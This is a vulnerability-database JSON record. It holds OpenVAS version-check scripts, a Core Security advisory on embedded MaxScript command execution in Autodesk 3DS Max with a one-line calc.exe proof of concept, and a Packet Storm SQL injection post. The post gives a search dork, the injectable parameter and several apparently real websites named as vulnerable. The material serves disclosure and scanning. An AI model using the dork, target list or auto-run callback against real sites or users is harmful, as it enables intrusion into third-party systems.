script_version(\"2019-10-23T10:55:06+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-05-02 10:28:58 +0200 (Tue, 02 May 2017)\");\n script_cve_id(\"CVE-2015-8285\");\n script_bugtraq_id(97996);\n\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"QuickHeal CVE-2015-8285 Denial of Service Vulnerability\");\n script_tag(name:\"summary\", value:\"QuickHeal is prone to a denial-of-service vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The vulnerability exists in the driver webssx.sys.\");\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to cause denial-of-service condition.\");\n script_tag(name:\"affected\", value:\"QuickHeal 16.00 is vulnerable\");\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for more information.\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/97996\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n\n script_family(\"General\");\n\n script_dependencies(\"gb_quick_heal_av_detect.nasl\");\n script_mandatory_keys(\"QuickHeal/Antivirus6432/Pro/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n\nif(!Ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_equal(version: Ver, test_version:\"16.00\"))\n{\n report = report_fixed_ver(installed_version:Ver, fixed_version:\"See information supplied by the vendor\");\n security_message(data:report);\n exit( 0 );\n}\n\nexit ( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:39", "bulletinFamily": "scanner", "description": "This host is installed with Symantec\n Symantec Workspace Streaming and is prone to an information disclosure\n vulnerability.", "modified": "2018-11-21T00:00:00", "published": "2016-07-18T00:00:00", "id": "OPENVAS:1361412562310808586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808586", "title": "Symantec Workspace Streaming Information Disclosure Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_symantec_workspace_streaming_info_disc_vuln.nasl 12455 2018-11-21 09:17:27Z cfischer $\n#\n# Symantec Workspace Streaming Information Disclosure Vulnerability\n#\n# Authors:\n# Tushar Khelge <tushar.khelge@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:symantec:workspace_streaming\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808586\");\n script_version(\"$Revision: 12455 $\");\n script_cve_id(\"CVE-2014-1649\");\n script_bugtraq_id(67189);\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 10:17:27 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-18 17:09:19 +0530 (Mon, 18 Jul 2016)\");\n script_name(\"Symantec Workspace Streaming Information Disclosure Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Symantec\n Symantec Workspace Streaming and is prone to an information disclosure\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to symantec workspace\n streaming server does not properly handle incoming HTTPS XMLRPC requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote\n attackers to execute arbitrary code on the server and create an unauthorized\n access point on the server.\");\n\n script_tag(name:\"affected\", value:\"Symantec Workspace Streaming before 7.5.0.749.\");\n\n script_tag(name:\"solution\", value:\"Update Symantec Workspace Streaming version 7.5.0.749\n and later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-14-127\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_symantec_workspace_streaming_detect.nasl\");\n script_mandatory_keys(\"Symantec/Workspace/Streaming/Agent/Win6432/Installed\");\n script_xref(name:\"URL\", value:\"https://support.symantec.com/\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!sepVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:sepVer, test_version:\"7.5.0.749\"))\n{\n report = report_fixed_ver(installed_version:sepVer, fixed_version:\"7.5.0.749\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-13T20:21:44", "bulletinFamily": "scanner", "description": "This host is installed with Python and is prone to buffer overflow\n vulnerability.", "modified": "2019-11-12T00:00:00", "published": "2014-03-05T00:00:00", "id": "OPENVAS:1361412562310804322", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804322", "title": "Python 'socket.recvfrom_into' Buffer Overflow Vulnerability Mar14 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Python 'socket.recvfrom_into' Buffer Overflow Vulnerability Mar14 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:python:python\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804322\");\n script_version(\"2019-11-12T13:34:01+0000\");\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-12 13:34:01 +0000 (Tue, 12 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-05 12:18:28 +0530 (Wed, 05 Mar 2014)\");\n script_name(\"Python 'socket.recvfrom_into' Buffer Overflow Vulnerability Mar14 (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_python_detect_win.nasl\");\n script_mandatory_keys(\"python/win/detected\");\n\n script_xref(name:\"URL\", value:\"http://bugs.python.org/issue20246\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56624\");\n script_xref(name:\"URL\", value:\"http://pastebin.com/raw.php?i=GHXSmNEg\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31875\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1029831\");\n script_xref(name:\"URL\", value:\"http://www.python.org/download/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Python and is prone to buffer overflow\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to a boundary error within the 'sock_recvfrom_into' function.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote attacker to cause a buffer\n overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Python version 2.5 before 2.7.7 and 3.x before 3.3.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Python version 2.7.7, 3.3.4 or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npyVer = infos['version'];\npypath = infos['location'];\n\nif(version_in_range(version:pyVer, test_version:\"2.5\", test_version2:\"2.7.6150\")||\n version_in_range(version:pyVer, test_version:\"3.0\", test_version2:\"3.3.3150\")){\n report = report_fixed_ver(installed_version:pyVer, fixed_version:\"2.7.7/3.3.4\", install_path:pypath);\n security_message(data:report);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-11-03T10:19:36", "bulletinFamily": "exploit", "description": "", "modified": "2012-03-11T00:00:00", "published": "2012-03-11T00:00:00", "href": "https://packetstormsecurity.com/files/110665/SRISMS-SQL-Injection.html", "id": "PACKETSTORM:110665", "type": "packetstorm", "title": "SRISMS SQL Injection", "sourceData": "`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [+] Official Website: http://www.1337day.com 0 \n1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1 \n0 0 \n1 ########################################## 1 \n0 I'm NuxbieCyber Member From Inj3ct0r Team 1 \n1 ########################################## 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \n \n[ SRISMS - SQL Injection Vulnerability ] \n \n[x] Author : the_cyber_nuxbie \n[x] Home : www.thecybernuxbie.com \n[x] E-mail : staff@thecybernuxbie.com \n[x] Found : 10 March 2012 @ 08:25 PM. \n[x] Tested : Back|Track 5. \n[x] Dork : inurl:\"/searchviewdetails.php?id=\" \n________________________________________________________________________ \n************************************************************************ \n \n- Info WebApps: \nThis Content WebApps Develop By: http://www.srisms.com/webdesigning.html \n \n- Exploit Report: \nhttp://localhost/WebApps/searchviewdetails.php?id=[SQL Injection] \n \n- Sample WebApps Vuln SQLi: \nhttp://gayatrivivahakendram.com/searchviewdetails.php?id=730' + [SQL Injection] \nhttp://agtsangham.com/searchviewdetails.php?id=400' + [SQL Injection] \nhttp://kapumarriagelinks.com/searchviewdetails.php?id=280' + [SQL Injection] \nhttp://visakhamarriagelines.com/searchviewdetails.php?id=8160' + [SQL Injection] \nhttp://kyathimarriages.com/searchviewdetails.php?id=780' + [SQL Injection] \nhttp://ssmarriagelinks.com/searchviewdetails.php?id=358' + [SQL Injection] \nhttp://srisimhadrimarriagelinks.com/searchviewdetails.php?id=568' + [SQL Injection] \n \n0day no more... \n\"n0 d0rk f0r k1dd10ts\" \n \n- Curahan Hati: \nI want to school college level... \n(the biggest obsession = S1 - TI) \nBut I do not have a cost... \nHelp Me...!!! \n \n- Greetz: \n*** 1337day Inject0r TEAM *** \n...:::' All Member & Staff Inject0r TEAM ':::... \n \n- Greetz To All Exploiters From Indonesian: \n[ Member Of Inj3ct0r & Exploit-DB ] \nAkatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel, \neidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t, \nk4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, NoGe, \nNTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death, \nteam_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc... \n \n\"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground\" \n \nMe @ March, 10 2012, GMT +08:25 Solo Raya, Indonesian. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/110665/srisms-sql.txt"}], "coresecurity": [{"lastseen": "2017-01-13T17:00:46", "bulletinFamily": "info", "description": "Core Security - CoreLabs\n\nAutodesk 3DS Max Application Callbacks Arbitrary Command Execution\n\n### 1\\. Advisory Information\n\n**Title: **Autodesk 3DS Max Application Callbacks Arbitrary Command Execution \n**Advisory Id: **CORE-2009-0909 \n**Advisory URL: **[http://www.coresecurity.com/content/3dsmax-arbitrary-command-execution](<3dsmax-arbitrary-command-execution>) \n**Date published: **2009-11-23 \n**Date of last update: **2009-11-20 \n**Vendors contacted: **Autodesk \n**Release mode: **User release\n\n### 2\\. Vulnerability Information\n\n**Class: **Failure to Sanitize Data into a Different Plane [[CWE-74](<http://cwe.mitre.org/data/definitions/74.html>)] \n**Impact: **Code execution \n**Remotely Exploitable: **Yes \n**Locally Exploitable: **No \n**Bugtraq ID: **[36634](<http://www.securityfocus.com/bid/36634>) \n**CVE Name: **[CVE-2009-3577](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3577>)\n\n### 3\\. Vulnerability Description\n\nAutodesk 3D Studio Max [2] is a modeling, animation and redering package widely used for video game , film , multimedia and web content developement. The software provides a built-in scripting language, allowing users to bind custome code to actions performed in the applciation. Execution of scripting code does not require explicit permission from the user. This mechanim can be exploited by an attacker to execute arbitrary code by enticing a victim to open .max file with MaxScript application callbacks embedded.\n\n### 4\\. Vulnerable packages\n\n * Autodesk 3DSMax 2010\n * Autodesk 3DSMax 2009\n * Autodesk 3DSMax 2008\n * Autodesk 3DSMax 9\n * Autodesk 3DSMax 8\n * Autodesk 3DSMax 7\n * Autodesk 3DSMax 6\n\n### 5\\. Vendor Information, Solutions and Workarounds\n\nThe vendor did not provide fixes or workaround information.\n\nYou can disable the automatic loading of embedded MaxScript by following these steps:\n\n * Go to Customize menu > Preferences > Preference Settings dialog > MAXScript.\n * Uncheck \"Load/Save Scene Scripts\".\n * Uncheck \"Load/Save Persistent Globals\".\n\n### 6\\. Credits\n\nThis vulnerability was discovered and researched by Sebasti\u00e1n Tello from Core Security Technologies during Bugweek 2009 [1].\n\nThe publication of this advisory was coordinated by Fernando Russ from Core Security Advisories Team.\n\n### 7\\. Technical Description / Proof of Concept Code\n\nAutodesk 3D Studio Max provides built-in scripting language called MaxScript, which can be used to automate repetitive tasks, combine existing functionality in new ways, develop new tools and user interfaces and much more. Max allows users to bind MaxScript to application callbacks in a way that could be exploited by an attacker to execute arbitrary code by enticing a victim to open .max file with MaxScript application callbacks embedded.\n\nA Proof of Concept file can be obtained by following these simple steps. Open Max, press F11 (MaxScript Listener), and paste this code:\n \n \n callbacks.addScript #filePostOpen (\"DOSCommand(\\\"calc.exe\\\")\") id:#mbLoadCallback persistent:true \n \n\n### 8\\. Report Timeline\n\n * **2009-08-25: **Core Security Technologies ask the Autodesk Assistance Team for a security contact to report the vulnerability.\n * **2009-09-22: **Core asks the Autodesk Assistance Team for a security contact to report the vulnerability.\n * **2009-10-09: **Core contacts CERT to obtain security contact information for Autodesk.\n * **2009-10-16: **CERT acknowledges the communication.\n * **2009-10-19: **CERT sends their available contact information for Autodesk.\n * **2009-10-19: **Core notifies Autodesk of the vulnerabilty report and announces its initial plan to publish the content on November 2nd, 2009. Core requests an acknoledgement within two working days and asks whehter the details should be sent encrypted or in plaintext.\n * **2009-10-19: **Autodesk acknowledges the report and requests the information to be provided in encrypted form.\n * **2009-10-20: **Core sends draft advisory and steps to reproduce the issue.\n * **2009-10-27: **Core asks Autodesk about the status of the vulnerability report sent on October 20th, 2009.\n * **2009-10-27: **Autodesk acknowledges the communication indicating that the pertinent Product Managers have been informed and are formulating a response.\n * **2009-11-06: **Core notifies Autodesk about the missed deadline of November 2nd, 2009 and reuqests an status update. Publication of CORE-2009-0909 is re-scheduled to November 16th, 2009 and is subject to change based on concrete feedback from Autodesk.\n * **2009-11-23: **Given the lack of response from Autodesk, Core decides to publish the advisory CORE-2009-0909 as \"user release\".\n\n### 9\\. References\n\n[1] The author participated in Core Bugweek 2009 as member of the team \"Gimbal Lock N Load\". \n[2] [http://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112](<http://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112>)\n\n### 10\\. About CoreLabs\n\nCoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [](<http://www.coresecurity.com/corelabs>)<http://www.coresecurity.com/corelabs>.\n\n### 11\\. About Core Security Technologies\n\nCore Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [](<http://www.coresecurity.com>)<http://www.coresecurity.com>.\n\n### 12\\. Disclaimer\n\nThe contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.\n\n### 13\\. PGP/GPG Keys\n\nThis advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.\n", "modified": "2009-11-20T00:00:00", "published": "2009-11-23T00:00:00", "href": "https://www.coresecurity.com/content/3dsmax-arbitrary-command-execution", "id": "CORE-2009-0909", "type": "coresecurity", "title": "Autodesk 3DS Max Application Callbacks Arbitrary Command Execution", "cvss": {}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", "description": "Buffer overflow on oversized thirst argument.", "modified": "2007-09-17T00:00:00", "published": "2007-09-17T00:00:00", "id": "SECURITYVULNS:VULN:8160", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8160", "title": "Microsoft Foundation Classes FindFile buffer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
